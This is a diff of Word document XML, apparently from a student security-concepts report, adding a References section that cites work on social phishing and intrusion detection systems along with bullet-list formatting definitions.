           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>(BOK) Security Concepts (week 9-10)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="6"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+      <w:bookmarkEnd w:id="13"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="14" w:name="_Toc113747835"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>References</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="14"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="480" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>Jagatic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, T. N., Johnson, N. A., Jakobsson, M., &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>Menczer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, F. (2007, October). Social phishing. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>Communications of the ACM</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t>50</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(10), 94–100. </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId33" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+            <w:lang w:eastAsia="en-GB"/>
+          </w:rPr>
+          <w:t>https://doi.org/10.1145/1290958.1290968</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:spacing w:line="480" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Wallen, D. (2020, March 3). </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Intrusion Detection Systems: A Deep Dive </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>Into</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> NIDS &amp; HIDS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Security Boulevard. Retrieved September 9, 2022, from </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId34" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          </w:rPr>
+          <w:t>https://securityboulevard.com/2020/03/intrusion-detection-systems-a-deep-dive-into-nids-hids/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:spacing w:line="480" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tudor, D. (2021, August 27). </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">What Is a Host Intrusion Detection System (HIDS) and How It </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>Works</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+        <w:t>Heimdal</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Security Blog. Retrieved September 9, 2022, from </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId35" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          </w:rPr>
+          <w:t>https://heimdalsecurity.com/blog/host-intrusion-detection-system-hids/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:line="480" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId33"/>
+      <w:headerReference w:type="default" r:id="rId36"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -4105,7 +7168,19 @@
       <w:rPr>
         <w:lang w:val="en-US"/>
       </w:rPr>
-      <w:t>Body Of Knowledge</w:t>
+      <w:t xml:space="preserve">Body </w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:lang w:val="en-US"/>
+      </w:rPr>
+      <w:t>o</w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:lang w:val="en-US"/>
+      </w:rPr>
+      <w:t>f Knowledge</w:t>
     </w:r>
   </w:p>
 </w:hdr>
@@ -4114,6 +7189,119 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="0FEA3056"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="33744242"/>
+    <w:lvl w:ilvl="0" w:tplc="08090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="770" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1490" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2210" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2930" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3650" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4370" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5090" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5810" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6530" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="13BA7716"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B62C6512"/>
@@ -4226,8 +7414,1445 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1CBC05CF"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="F8E8A66E"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="3360242C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="EFFC26B0"/>
+    <w:lvl w:ilvl="0" w:tplc="3F38D8DA">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
